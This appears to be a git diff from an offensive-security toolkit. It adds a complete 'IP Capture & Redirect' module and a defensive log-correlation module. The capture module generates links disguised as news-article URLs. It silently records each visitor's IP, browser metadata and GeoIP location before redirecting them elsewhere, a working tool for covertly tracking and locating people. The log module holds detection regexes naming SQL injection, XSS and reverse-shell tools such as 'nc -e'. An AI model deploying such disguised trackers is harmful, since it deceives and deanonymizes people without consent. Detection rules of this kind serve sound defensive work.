||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '7':
|
||||
for e in engine.list_evidence():
|
||||
mb = e['size'] / (1024*1024)
|
||||
print(f" {e['name']} ({mb:.1f} MB)")
|
||||
elif choice == '8':
|
||||
for c in engine.list_carved():
|
||||
print(f" {c['name']} ({c['size']} bytes)")
|
||||
elif choice == '9':
|
||||
log = engine.get_custody_log()
|
||||
print(f" {len(log)} entries:")
|
||||
for entry in log[-10:]:
|
||||
print(f" [{entry['timestamp'][:19]}] {entry['action']}: {entry['target']}")
|
||||
1100
modules/hack_hijack.py
Normal file
1100
modules/hack_hijack.py
Normal file
File diff suppressed because it is too large
Load Diff
427
modules/ipcapture.py
Normal file
427
modules/ipcapture.py
Normal file
@ -0,0 +1,427 @@
|
||||
"""IP Capture & Redirect — stealthy link tracking for OSINT.
|
||||
|
||||
Create disguised links that capture visitor IP + metadata,
|
||||
then redirect to a legitimate target URL. Fast 302 redirect,
|
||||
realistic URL paths, no suspicious indicators.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "IP Capture & Redirect — stealthy link tracking"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "osint"
|
||||
|
||||
import os
|
||||
import json
|
||||
import time
|
||||
import random
|
||||
import string
|
||||
import hashlib
|
||||
import threading
|
||||
from datetime import datetime
|
||||
from pathlib import Path
|
||||
from typing import Dict, List, Optional
|
||||
|
||||
try:
|
||||
from core.paths import get_data_dir
|
||||
except ImportError:
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
|
||||
# ── Realistic URL path generation ────────────────────────────────────────────
|
||||
|
||||
_WORD_POOL = [
|
||||
'tech', 'news', 'science', 'world', 'business', 'health', 'politics',
|
||||
'sports', 'culture', 'opinion', 'breaking', 'latest', 'update', 'report',
|
||||
'analysis', 'insight', 'review', 'guide', 'how-to', 'explained',
|
||||
'ai', 'climate', 'economy', 'security', 'research', 'innovation',
|
||||
'digital', 'global', 'local', 'industry', 'future', 'trends',
|
||||
'development', 'infrastructure', 'community', 'education', 'policy',
|
||||
]
|
||||
|
||||
_TITLE_PATTERNS = [
|
||||
'{adj}-{noun}-{verb}-{year}-{noun2}',
|
||||
'{noun}-{adj}-{noun2}-{verb}',
|
||||
'new-{noun}-{verb}-{adj}-{noun2}',
|
||||
'{noun}-report-{year}-{adj}-{noun2}',
|
||||
'how-{noun}-is-{verb}-the-{noun2}',
|
||||
'{adj}-{noun}-breakthrough-{noun2}',
|
||||
]
|
||||
|
||||
_ADJECTIVES = [
|
||||
'major', 'new', 'latest', 'critical', 'emerging', 'global',
|
||||
'innovative', 'surprising', 'important', 'unprecedented',
|
||||
]
|
||||
|
||||
_NOUNS = [
|
||||
'technology', 'researchers', 'companies', 'governments', 'scientists',
|
||||
'industry', 'market', 'community', 'experts', 'development',
|
||||
]
|
||||
|
||||
_VERBS = [
|
||||
'changing', 'transforming', 'disrupting', 'advancing', 'impacting',
|
||||
'reshaping', 'driving', 'revealing', 'challenging', 'accelerating',
|
||||
]
|
||||
|
||||
|
||||
def _generate_article_path() -> str:
|
||||
"""Generate a realistic-looking article URL path."""
|
||||
now = datetime.now()
|
||||
year = now.strftime('%Y')
|
||||
month = now.strftime('%m')
|
||||
|
||||
pattern = random.choice(_TITLE_PATTERNS)
|
||||
slug = pattern.format(
|
||||
adj=random.choice(_ADJECTIVES),
|
||||
noun=random.choice(_NOUNS),
|
||||
noun2=random.choice(_NOUNS),
|
||||
verb=random.choice(_VERBS),
|
||||
year=year,
|
||||
)
|
||||
|
||||
# Article-style path
|
||||
styles = [
|
||||
f'/article/{year}/{month}/{slug}',
|
||||
f'/news/{year}/{slug}',
|
||||
f'/stories/{slug}-{random.randint(1000, 9999)}',
|
||||
f'/p/{slug}',
|
||||
f'/read/{hashlib.md5(slug.encode()).hexdigest()[:8]}',
|
||||
]
|
||||
return random.choice(styles)
|
||||
|
||||
|
||||
def _generate_short_key(length: int = 8) -> str:
|
||||
"""Generate a short random key."""
|
||||
chars = string.ascii_lowercase + string.digits
|
||||
return ''.join(random.choices(chars, k=length))
|
||||
|
||||
|
||||
# ── IP Capture Service ───────────────────────────────────────────────────────
|
||||
|
||||
class IPCaptureService:
|
||||
"""Manage capture links and record visitor metadata."""
|
||||
|
||||
def __init__(self):
|
||||
self._file = os.path.join(get_data_dir(), 'osint_captures.json')
|
||||
self._links = {}
|
||||
self._lock = threading.Lock()
|
||||
self._load()
|
||||
|
||||
def _load(self):
|
||||
if os.path.exists(self._file):
|
||||
try:
|
||||
with open(self._file, 'r') as f:
|
||||
self._links = json.load(f)
|
||||
except Exception:
|
||||
self._links = {}
|
||||
|
||||
def _save(self):
|
||||
os.makedirs(os.path.dirname(self._file), exist_ok=True)
|
||||
with open(self._file, 'w') as f:
|
||||
json.dump(self._links, f, indent=2)
|
||||
|
||||
def create_link(self, target_url: str, name: str = '',
|
||||
disguise: str = 'article') -> dict:
|
||||
"""Create a new capture link.
|
||||
|
||||
Args:
|
||||
target_url: The legitimate URL to redirect to after capture.
|
||||
name: Friendly name for this link.
|
||||
disguise: URL style — 'short', 'article', or 'custom'.
|
||||
|
||||
Returns:
|
||||
Dict with key, paths, and full URLs.
|
||||
"""
|
||||
key = _generate_short_key()
|
||||
|
||||
if disguise == 'article':
|
||||
article_path = _generate_article_path()
|
||||
elif disguise == 'short':
|
||||
article_path = f'/c/{key}'
|
||||
else:
|
||||
article_path = f'/c/{key}'
|
||||
|
||||
with self._lock:
|
||||
self._links[key] = {
|
||||
'key': key,
|
||||
'name': name or f'Link {key}',
|
||||
'target_url': target_url,
|
||||
'disguise': disguise,
|
||||
'article_path': article_path,
|
||||
'short_path': f'/c/{key}',
|
||||
'created': datetime.now().isoformat(),
|
||||
'captures': [],
|
||||
'active': True,
|
||||
}
|
||||
self._save()
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'key': key,
|
||||
'short_path': f'/c/{key}',
|
||||
'article_path': article_path,
|
||||
'target_url': target_url,
|
||||
}
|
||||
|
||||
def get_link(self, key: str) -> Optional[dict]:
|
||||
return self._links.get(key)
|
||||
|
||||
def list_links(self) -> List[dict]:
|
||||
return list(self._links.values())
|
||||
|
||||
def delete_link(self, key: str) -> bool:
|
||||
with self._lock:
|
||||
if key in self._links:
|
||||
del self._links[key]
|
||||
self._save()
|
||||
return True
|
||||
return False
|
||||
|
||||
def find_by_path(self, path: str) -> Optional[dict]:
|
||||
"""Find a link by its article path."""
|
||||
for link in self._links.values():
|
||||
if link.get('article_path') == path:
|
||||
return link
|
||||
return None
|
||||
|
||||
def record_capture(self, key: str, ip: str, user_agent: str = '',
|
||||
accept_language: str = '', referer: str = '',
|
||||
headers: dict = None) -> bool:
|
||||
"""Record a visitor capture."""
|
||||
with self._lock:
|
||||
link = self._links.get(key)
|
||||
if not link or not link.get('active'):
|
||||
return False
|
||||
|
||||
capture = {
|
||||
'ip': ip,
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'user_agent': user_agent,
|
||||
'accept_language': accept_language,
|
||||
'referer': referer,
|
||||
}
|
||||
|
||||
# Extract extra metadata from headers
|
||||
if headers:
|
||||
for h in ['X-Forwarded-For', 'CF-Connecting-IP', 'X-Real-IP']:
|
||||
val = headers.get(h, '')
|
||||
if val:
|
||||
capture[f'header_{h.lower().replace("-","_")}'] = val
|
||||
# Connection hints
|
||||
for h in ['Sec-CH-UA', 'Sec-CH-UA-Platform', 'Sec-CH-UA-Mobile',
|
||||
'DNT', 'Upgrade-Insecure-Requests']:
|
||||
val = headers.get(h, '')
|
||||
if val:
|
||||
capture[f'hint_{h.lower().replace("-","_")}'] = val
|
||||
|
||||
# GeoIP lookup (best-effort)
|
||||
try:
|
||||
geo = self._geoip_lookup(ip)
|
||||
if geo:
|
||||
capture['geo'] = geo
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
link['captures'].append(capture)
|
||||
self._save()
|
||||
return True
|
||||
|
||||
def _geoip_lookup(self, ip: str) -> Optional[dict]:
|
||||
"""Best-effort GeoIP lookup using the existing geoip module."""
|
||||
try:
|
||||
from modules.geoip import GeoIPLookup
|
||||
geo = GeoIPLookup()
|
||||
result = geo.lookup(ip)
|
||||
if result and result.get('success'):
|
||||
return {
|
||||
'country': result.get('country', ''),
|
||||
'region': result.get('region', ''),
|
||||
'city': result.get('city', ''),
|
||||
'isp': result.get('isp', ''),
|
||||
'lat': result.get('latitude', ''),
|
||||
'lon': result.get('longitude', ''),
|
||||
}
|
||||
except Exception:
|
||||
pass
|
||||
return None
|
||||
|
||||
def get_captures(self, key: str) -> List[dict]:
|
||||
link = self._links.get(key)
|
||||
return link.get('captures', []) if link else []
|
||||
|
||||
def get_stats(self, key: str) -> dict:
|
||||
link = self._links.get(key)
|
||||
if not link:
|
||||
return {}
|
||||
captures = link.get('captures', [])
|
||||
unique_ips = set(c['ip'] for c in captures)
|
||||
return {
|
||||
'total': len(captures),
|
||||
'unique_ips': len(unique_ips),
|
||||
'first': captures[0]['timestamp'] if captures else None,
|
||||
'last': captures[-1]['timestamp'] if captures else None,
|
||||
}
|
||||
|
||||
def export_captures(self, key: str, fmt: str = 'json') -> str:
|
||||
"""Export captures to JSON or CSV string."""
|
||||
captures = self.get_captures(key)
|
||||
if fmt == 'csv':
|
||||
if not captures:
|
||||
return 'ip,timestamp,user_agent,country,city\n'
|
||||
lines = ['ip,timestamp,user_agent,country,city']
|
||||
for c in captures:
|
||||
geo = c.get('geo', {})
|
||||
lines.append(','.join([
|
||||
c.get('ip', ''),
|
||||
c.get('timestamp', ''),
|
||||
f'"{c.get("user_agent", "")}"',
|
||||
geo.get('country', ''),
|
||||
geo.get('city', ''),
|
||||
]))
|
||||
return '\n'.join(lines)
|
||||
return json.dumps(captures, indent=2)
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
_lock = threading.Lock()
|
||||
|
||||
|
||||
def get_ip_capture() -> IPCaptureService:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
with _lock:
|
||||
if _instance is None:
|
||||
_instance = IPCaptureService()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── Interactive CLI ──────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""Interactive CLI for IP Capture & Redirect."""
|
||||
service = get_ip_capture()
|
||||
|
||||
while True:
|
||||
print("\n" + "=" * 60)
|
||||
print(" IP CAPTURE & REDIRECT")
|
||||
print(" Stealthy link tracking for OSINT")
|
||||
print("=" * 60)
|
||||
links = service.list_links()
|
||||
active = sum(1 for l in links if l.get('active'))
|
||||
total_captures = sum(len(l.get('captures', [])) for l in links)
|
||||
print(f" Active links: {active} | Total captures: {total_captures}")
|
||||
print()
|
||||
print(" 1 — Create Capture Link")
|
||||
print(" 2 — List Active Links")
|
||||
print(" 3 — View Captures")
|
||||
print(" 4 — Delete Link")
|
||||
print(" 5 — Export Captures")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" Select: ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
_cli_create(service)
|
||||
elif choice == '2':
|
||||
_cli_list(service)
|
||||
elif choice == '3':
|
||||
_cli_view(service)
|
||||
elif choice == '4':
|
||||
_cli_delete(service)
|
||||
elif choice == '5':
|
||||
_cli_export(service)
|
||||
|
||||
|
||||
def _cli_create(service: IPCaptureService):
|
||||
"""Create a new capture link."""
|
||||
print("\n--- Create Capture Link ---")
|
||||
target = input(" Target URL (redirect destination): ").strip()
|
||||
if not target:
|
||||
print(" [!] URL required")
|
||||
return
|
||||
if not target.startswith(('http://', 'https://')):
|
||||
target = 'https://' + target
|
||||
|
||||
name = input(" Friendly name []: ").strip()
|
||||
print(" Disguise type:")
|
||||
print(" 1 — Article URL (realistic path)")
|
||||
print(" 2 — Short URL (/c/xxxxx)")
|
||||
dtype = input(" Select [1]: ").strip() or '1'
|
||||
disguise = 'article' if dtype == '1' else 'short'
|
||||
|
||||
result = service.create_link(target, name, disguise)
|
||||
if result['ok']:
|
||||
print(f"\n [+] Link created!")
|
||||
print(f" Key: {result['key']}")
|
||||
print(f" Short URL: <your-host>{result['short_path']}")
|
||||
print(f" Article URL: <your-host>{result['article_path']}")
|
||||
print(f" Redirects to: {result['target_url']}")
|
||||
else:
|
||||
print(f" [-] {result.get('error', 'Failed')}")
|
||||
|
||||
|
||||
def _cli_list(service: IPCaptureService):
|
||||
"""List all active links."""
|
||||
links = service.list_links()
|
||||
if not links:
|
||||
print("\n No capture links")
|
||||
return
|
||||
print(f"\n--- Active Links ({len(links)}) ---")
|
||||
for l in links:
|
||||
stats = service.get_stats(l['key'])
|
||||
active = "ACTIVE" if l.get('active') else "DISABLED"
|
||||
print(f"\n [{l['key']}] {l.get('name', 'Unnamed')} — {active}")
|
||||
print(f" Target: {l['target_url']}")
|
||||
print(f" Short: {l['short_path']}")
|
||||
print(f" Article: {l.get('article_path', 'N/A')}")
|
||||
print(f" Captures: {stats.get('total', 0)} ({stats.get('unique_ips', 0)} unique)")
|
||||
if stats.get('last'):
|
||||
print(f" Last hit: {stats['last']}")
|
||||
|
||||
|
||||
def _cli_view(service: IPCaptureService):
|
||||
"""View captures for a link."""
|
||||
key = input(" Link key: ").strip()
|
||||
captures = service.get_captures(key)
|
||||
if not captures:
|
||||
print(" No captures for this link")
|
||||
return
|
||||
print(f"\n--- Captures ({len(captures)}) ---")
|
||||
for c in captures:
|
||||
geo = c.get('geo', {})
|
||||
location = f"{geo.get('city', '?')}, {geo.get('country', '?')}" if geo else 'Unknown'
|
||||
print(f" {c['timestamp']} {c['ip']:>15} {location}")
|
||||
if c.get('user_agent'):
|
||||
ua = c['user_agent'][:80] + ('...' if len(c.get('user_agent', '')) > 80 else '')
|
||||
print(f" UA: {ua}")
|
||||
|
||||
|
||||
def _cli_delete(service: IPCaptureService):
|
||||
"""Delete a link."""
|
||||
key = input(" Link key to delete: ").strip()
|
||||
if service.delete_link(key):
|
||||
print(" [+] Link deleted")
|
||||
else:
|
||||
print(" [-] Link not found")
|
||||
|
||||
|
||||
def _cli_export(service: IPCaptureService):
|
||||
"""Export captures."""
|
||||
key = input(" Link key: ").strip()
|
||||
fmt = input(" Format (json/csv) [json]: ").strip() or 'json'
|
||||
data = service.export_captures(key, fmt)
|
||||
print(f"\n{data}")
|
||||
|
||||
save = input("\n Save to file? [y/N]: ").strip().lower()
|
||||
if save == 'y':
|
||||
ext = 'csv' if fmt == 'csv' else 'json'
|
||||
filepath = os.path.join(get_data_dir(), 'exports', f'captures_{key}.{ext}')
|
||||
os.makedirs(os.path.dirname(filepath), exist_ok=True)
|
||||
with open(filepath, 'w') as f:
|
||||
f.write(data)
|
||||
print(f" [+] Saved to {filepath}")
|
||||
1097
modules/loadtest.py
Normal file
1097
modules/loadtest.py
Normal file
File diff suppressed because it is too large
Load Diff
551
modules/log_correlator.py
Normal file
551
modules/log_correlator.py
Normal file
@ -0,0 +1,551 @@
|
||||
"""AUTARCH Log Correlator
|
||||
|
||||
Syslog ingestion, pattern matching, anomaly detection, alert rules,
|
||||
timeline correlation, and mini-SIEM functionality.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Log correlation & anomaly detection (mini-SIEM)"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "defense"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import threading
|
||||
from pathlib import Path
|
||||
from datetime import datetime, timezone
|
||||
from collections import Counter, defaultdict
|
||||
from typing import Dict, List, Optional, Any
|
||||
|
||||
try:
|
||||
from core.paths import get_data_dir
|
||||
except ImportError:
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
|
||||
# ── Built-in Detection Rules ────────────────────────────────────────────────
|
||||
|
||||
DEFAULT_RULES = [
|
||||
{
|
||||
'id': 'brute_force_ssh',
|
||||
'name': 'SSH Brute Force',
|
||||
'pattern': r'(Failed password|authentication failure).*ssh',
|
||||
'severity': 'high',
|
||||
'threshold': 5,
|
||||
'window_seconds': 60,
|
||||
'description': 'Multiple failed SSH login attempts'
|
||||
},
|
||||
{
|
||||
'id': 'brute_force_web',
|
||||
'name': 'Web Login Brute Force',
|
||||
'pattern': r'(401|403).*POST.*(login|auth|signin)',
|
||||
'severity': 'high',
|
||||
'threshold': 10,
|
||||
'window_seconds': 60,
|
||||
'description': 'Multiple failed web login attempts'
|
||||
},
|
||||
{
|
||||
'id': 'sql_injection',
|
||||
'name': 'SQL Injection Attempt',
|
||||
'pattern': r"(UNION\s+SELECT|OR\s+1\s*=\s*1|DROP\s+TABLE|'--|\bSLEEP\()",
|
||||
'severity': 'critical',
|
||||
'threshold': 1,
|
||||
'window_seconds': 0,
|
||||
'description': 'SQL injection pattern detected'
|
||||
},
|
||||
{
|
||||
'id': 'xss_attempt',
|
||||
'name': 'XSS Attempt',
|
||||
'pattern': r'(<script|javascript:|onerror=|onload=|<svg\s+onload)',
|
||||
'severity': 'high',
|
||||
'threshold': 1,
|
||||
'window_seconds': 0,
|
||||
'description': 'Cross-site scripting pattern detected'
|
||||
},
|
||||
{
|
||||
'id': 'path_traversal',
|
||||
'name': 'Path Traversal',
|
||||
'pattern': r'(\.\./|\.\.\\|%2e%2e)',
|
||||
'severity': 'high',
|
||||
'threshold': 1,
|
||||
'window_seconds': 0,
|
||||
'description': 'Directory traversal attempt'
|
||||
},
|
||||
{
|
||||
'id': 'priv_escalation',
|
||||
'name': 'Privilege Escalation',
|
||||
'pattern': r'(sudo|su\s+-|pkexec|gpasswd|usermod.*-G.*sudo)',
|
||||
'severity': 'medium',
|
||||
'threshold': 3,
|
||||
'window_seconds': 300,
|
||||
'description': 'Multiple privilege escalation attempts'
|
||||
},
|
||||
{
|
||||
'id': 'port_scan',
|
||||
'name': 'Port Scan Detected',
|
||||
'pattern': r'(connection refused|reset by peer|SYN_RECV)',
|
||||
'severity': 'medium',
|
||||
'threshold': 20,
|
||||
'window_seconds': 10,
|
||||
'description': 'Rapid connection attempts indicate scanning'
|
||||
},
|
||||
{
|
||||
'id': 'suspicious_download',
|
||||
'name': 'Suspicious Download',
|
||||
'pattern': r'(wget|curl|python.*http|nc\s+-e)',
|
||||
'severity': 'medium',
|
||||
'threshold': 1,
|
||||
'window_seconds': 0,
|
||||
'description': 'Potential malicious download or reverse shell'
|
||||
},
|
||||
{
|
||||
'id': 'service_crash',
|
||||
'name': 'Service Crash',
|
||||
'pattern': r'(segfault|core dumped|out of memory|killed process)',
|
||||
'severity': 'high',
|
||||
'threshold': 1,
|
||||
'window_seconds': 0,
|
||||
'description': 'Service crash or OOM event'
|
||||
},
|
||||
{
|
||||
'id': 'root_login',
|
||||
'name': 'Root Login',
|
||||
'pattern': r'(session opened.*root|Accepted.*root|su.*root)',
|
||||
'severity': 'medium',
|
||||
'threshold': 1,
|
||||
'window_seconds': 0,
|
||||
'description': 'Root/admin login detected'
|
||||
},
|
||||
]
|
||||
|
||||
|
||||
# ── Log Parser ───────────────────────────────────────────────────────────────
|
||||
|
||||
class LogParser:
|
||||
"""Multi-format log parser."""
|
||||
|
||||
SYSLOG_RE = re.compile(
|
||||
r'^(\w{3}\s+\d+\s+\d{2}:\d{2}:\d{2})\s+(\S+)\s+(\S+?)(?:\[(\d+)\])?:\s*(.*)'
|
||||
)
|
||||
APACHE_RE = re.compile(
|
||||
r'^(\S+)\s+\S+\s+\S+\s+\[([^\]]+)\]\s+"(\S+)\s+(\S+)\s+\S+"\s+(\d+)\s+(\d+)'
|
||||
)
|
||||
JSON_LOG_RE = re.compile(r'^\{.*\}$')
|
||||
|
||||
@staticmethod
|
||||
def parse_line(line: str) -> Optional[Dict]:
|
||||
"""Parse a single log line."""
|
||||
line = line.strip()
|
||||
if not line:
|
||||
return None
|
||||
|
||||
# Try JSON format
|
||||
if LogParser.JSON_LOG_RE.match(line):
|
||||
try:
|
||||
data = json.loads(line)
|
||||
return {
|
||||
'format': 'json',
|
||||
'timestamp': data.get('timestamp', data.get('time', data.get('@timestamp', ''))),
|
||||
'source': data.get('source', data.get('host', '')),
|
||||
'program': data.get('program', data.get('service', data.get('logger', ''))),
|
||||
'message': data.get('message', data.get('msg', str(data))),
|
||||
'level': data.get('level', data.get('severity', 'info')),
|
||||
'raw': line
|
||||
}
|
||||
except json.JSONDecodeError:
|
||||
pass
|
||||
|
||||
# Try syslog format
|
||||
m = LogParser.SYSLOG_RE.match(line)
|
||||
if m:
|
||||
return {
|
||||
'format': 'syslog',
|
||||
'timestamp': m.group(1),
|
||||
'source': m.group(2),
|
||||
'program': m.group(3),
|
||||
'pid': m.group(4),
|
||||
'message': m.group(5),
|
||||
'raw': line
|
||||
}
|
||||
|
||||
# Try Apache/Nginx format
|
||||
m = LogParser.APACHE_RE.match(line)
|
||||
if m:
|
||||
return {
|
||||
'format': 'apache',
|
||||
'timestamp': m.group(2),
|
||||
'source': m.group(1),
|
||||
'method': m.group(3),
|
||||
'path': m.group(4),
|
||||
'status': int(m.group(5)),
|
||||
'size': int(m.group(6)),
|
||||
'message': line,
|
||||
'raw': line
|
||||
}
|
||||
|
||||
# Generic fallback
|
||||
return {
|
||||
'format': 'unknown',
|
||||
'timestamp': '',
|
||||
'message': line,
|
||||
'raw': line
|
||||
}
|
||||
|
||||
|
||||
# ── Log Correlator Engine ────────────────────────────────────────────────────
|
||||
|
||||
class LogCorrelator:
|
||||
"""Log correlation and anomaly detection engine."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'log_correlator')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
|
||||
self.rules: List[Dict] = list(DEFAULT_RULES)
|
||||
self.alerts: List[Dict] = []
|
||||
self.logs: List[Dict] = []
|
||||
self.sources: Dict[str, Dict] = {}
|
||||
self._rule_hits: Dict[str, List[float]] = defaultdict(list)
|
||||
self._lock = threading.Lock()
|
||||
self._load_custom_rules()
|
||||
self._load_alerts()
|
||||
|
||||
def _load_custom_rules(self):
|
||||
rules_file = os.path.join(self.data_dir, 'custom_rules.json')
|
||||
if os.path.exists(rules_file):
|
||||
try:
|
||||
with open(rules_file) as f:
|
||||
custom = json.load(f)
|
||||
self.rules.extend(custom)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def _save_custom_rules(self):
|
||||
# Only save non-default rules
|
||||
default_ids = {r['id'] for r in DEFAULT_RULES}
|
||||
custom = [r for r in self.rules if r['id'] not in default_ids]
|
||||
rules_file = os.path.join(self.data_dir, 'custom_rules.json')
|
||||
with open(rules_file, 'w') as f:
|
||||
json.dump(custom, f, indent=2)
|
||||
|
||||
def _load_alerts(self):
|
||||
alerts_file = os.path.join(self.data_dir, 'alerts.json')
|
||||
if os.path.exists(alerts_file):
|
||||
try:
|
||||
with open(alerts_file) as f:
|
||||
self.alerts = json.load(f)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def _save_alerts(self):
|
||||
alerts_file = os.path.join(self.data_dir, 'alerts.json')
|
||||
with open(alerts_file, 'w') as f:
|
||||
json.dump(self.alerts[-1000:], f, indent=2)
|
||||
|
||||
# ── Log Ingestion ────────────────────────────────────────────────────
|
||||
|
||||
def ingest_file(self, filepath: str, source_name: str = None) -> Dict:
|
||||
"""Ingest log file for analysis."""
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
|
||||
source = source_name or Path(filepath).name
|
||||
parsed = 0
|
||||
alerts_generated = 0
|
||||
|
||||
try:
|
||||
with open(filepath, 'r', errors='ignore') as f:
|
||||
for line in f:
|
||||
entry = LogParser.parse_line(line)
|
||||
if entry:
|
||||
entry['source_file'] = source
|
||||
self.logs.append(entry)
|
||||
parsed += 1
|
||||
|
||||
# Run detection rules
|
||||
new_alerts = self._check_rules(entry)
|
||||
alerts_generated += len(new_alerts)
|
||||
|
||||
self.sources[source] = {
|
||||
'file': filepath,
|
||||
'lines': parsed,
|
||||
'ingested': datetime.now(timezone.utc).isoformat()
|
||||
}
|
||||
|
||||
if alerts_generated:
|
||||
self._save_alerts()
|
||||
|
||||
return {
|
||||
'ok': True, 'source': source,
|
||||
'lines_parsed': parsed,
|
||||
'alerts_generated': alerts_generated
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def ingest_text(self, text: str, source_name: str = 'paste') -> Dict:
|
||||
"""Ingest log text directly."""
|
||||
parsed = 0
|
||||
alerts_generated = 0
|
||||
|
||||
for line in text.strip().splitlines():
|
||||
entry = LogParser.parse_line(line)
|
||||
if entry:
|
||||
entry['source_file'] = source_name
|
||||
self.logs.append(entry)
|
||||
parsed += 1
|
||||
new_alerts = self._check_rules(entry)
|
||||
alerts_generated += len(new_alerts)
|
||||
|
||||
if alerts_generated:
|
||||
self._save_alerts()
|
||||
|
||||
return {
|
||||
'ok': True, 'source': source_name,
|
||||
'lines_parsed': parsed,
|
||||
'alerts_generated': alerts_generated
|
||||
}
|
||||
|
||||
# ── Detection ────────────────────────────────────────────────────────
|
||||
|
||||
def _check_rules(self, entry: Dict) -> List[Dict]:
|
||||
"""Check log entry against detection rules."""
|
||||
new_alerts = []
|
||||
message = entry.get('message', '') + ' ' + entry.get('raw', '')
|
||||
now = time.time()
|
||||
|
||||
for rule in self.rules:
|
||||
try:
|
||||
if re.search(rule['pattern'], message, re.I):
|
||||
rule_id = rule['id']
|
||||
|
||||
# Threshold check
|
||||
if rule.get('threshold', 1) > 1 and rule.get('window_seconds', 0) > 0:
|
||||
with self._lock:
|
||||
self._rule_hits[rule_id].append(now)
|
||||
# Clean old hits
|
||||
window = rule['window_seconds']
|
||||
self._rule_hits[rule_id] = [
|
||||
t for t in self._rule_hits[rule_id]
|
||||
if now - t <= window
|
||||
]
|
||||
if len(self._rule_hits[rule_id]) < rule['threshold']:
|
||||
continue
|
||||
|
||||
alert = {
|
||||
'timestamp': datetime.now(timezone.utc).isoformat(),
|
||||
'rule_id': rule_id,
|
||||
'rule_name': rule['name'],
|
||||
'severity': rule['severity'],
|
||||
'description': rule['description'],
|
||||
'source': entry.get('source_file', ''),
|
||||
'log_entry': entry.get('message', '')[:200],
|
||||
'raw': entry.get('raw', '')[:300]
|
||||
}
|
||||
self.alerts.append(alert)
|
||||
new_alerts.append(alert)
|
||||
except re.error:
|
||||
pass
|
||||
|
||||
return new_alerts
|
||||
|
||||
# ── Rule Management ──────────────────────────────────────────────────
|
||||
|
||||
def add_rule(self, rule_id: str, name: str, pattern: str,
|
||||
severity: str = 'medium', threshold: int = 1,
|
||||
window_seconds: int = 0, description: str = '') -> Dict:
|
||||
"""Add custom detection rule."""
|
||||
# Validate regex
|
||||
try:
|
||||
re.compile(pattern)
|
||||
except re.error as e:
|
||||
return {'ok': False, 'error': f'Invalid regex: {e}'}
|
||||
|
||||
rule = {
|
||||
'id': rule_id, 'name': name, 'pattern': pattern,
|
||||
'severity': severity, 'threshold': threshold,
|
||||
'window_seconds': window_seconds,
|
||||
'description': description
|
||||
}
|
||||
self.rules.append(rule)
|
||||
self._save_custom_rules()
|
||||
return {'ok': True, 'rule': rule}
|
||||
|
||||
def remove_rule(self, rule_id: str) -> Dict:
|
||||
"""Remove a custom rule."""
|
||||
default_ids = {r['id'] for r in DEFAULT_RULES}
|
||||
if rule_id in default_ids:
|
||||
return {'ok': False, 'error': 'Cannot remove built-in rule'}
|
||||
|
||||
before = len(self.rules)
|
||||
self.rules = [r for r in self.rules if r['id'] != rule_id]
|
||||
if len(self.rules) < before:
|
||||
self._save_custom_rules()
|
||||
return {'ok': True}
|
||||
return {'ok': False, 'error': 'Rule not found'}
|
||||
|
||||
def get_rules(self) -> List[Dict]:
|
||||
"""List all detection rules."""
|
||||
default_ids = {r['id'] for r in DEFAULT_RULES}
|
||||
return [{**r, 'builtin': r['id'] in default_ids} for r in self.rules]
|
||||
|
||||
# ── Analysis ─────────────────────────────────────────────────────────
|
||||
|
||||
def search_logs(self, query: str, source: str = None,
|
||||
limit: int = 100) -> List[Dict]:
|
||||
"""Search ingested logs."""
|
||||
results = []
|
||||
for entry in reversed(self.logs):
|
||||
if source and entry.get('source_file') != source:
|
||||
continue
|
||||
if query.lower() in (entry.get('message', '') + entry.get('raw', '')).lower():
|
||||
results.append(entry)
|
||||
if len(results) >= limit:
|
||||
break
|
||||
return results
|
||||
|
||||
def get_stats(self) -> Dict:
|
||||
"""Get correlator statistics."""
|
||||
severity_counts = Counter(a['severity'] for a in self.alerts)
|
||||
rule_counts = Counter(a['rule_id'] for a in self.alerts)
|
||||
source_counts = Counter(e.get('source_file', '') for e in self.logs)
|
||||
|
||||
return {
|
||||
'total_logs': len(self.logs),
|
||||
'total_alerts': len(self.alerts),
|
||||
'sources': len(self.sources),
|
||||
'rules': len(self.rules),
|
||||
'alerts_by_severity': dict(severity_counts),
|
||||
'top_rules': dict(rule_counts.most_common(10)),
|
||||
'top_sources': dict(source_counts.most_common(10))
|
||||
}
|
||||
|
||||
def get_alerts(self, severity: str = None, limit: int = 100) -> List[Dict]:
|
||||
"""Get alerts with optional filtering."""
|
||||
alerts = self.alerts
|
||||
if severity:
|
||||
alerts = [a for a in alerts if a['severity'] == severity]
|
||||
return alerts[-limit:]
|
||||
|
||||
def clear_alerts(self):
|
||||
"""Clear all alerts."""
|
||||
self.alerts.clear()
|
||||
self._save_alerts()
|
||||
|
||||
def clear_logs(self):
|
||||
"""Clear ingested logs."""
|
||||
self.logs.clear()
|
||||
self.sources.clear()
|
||||
|
||||
def get_sources(self) -> Dict:
|
||||
"""Get ingested log sources."""
|
||||
return self.sources
|
||||
|
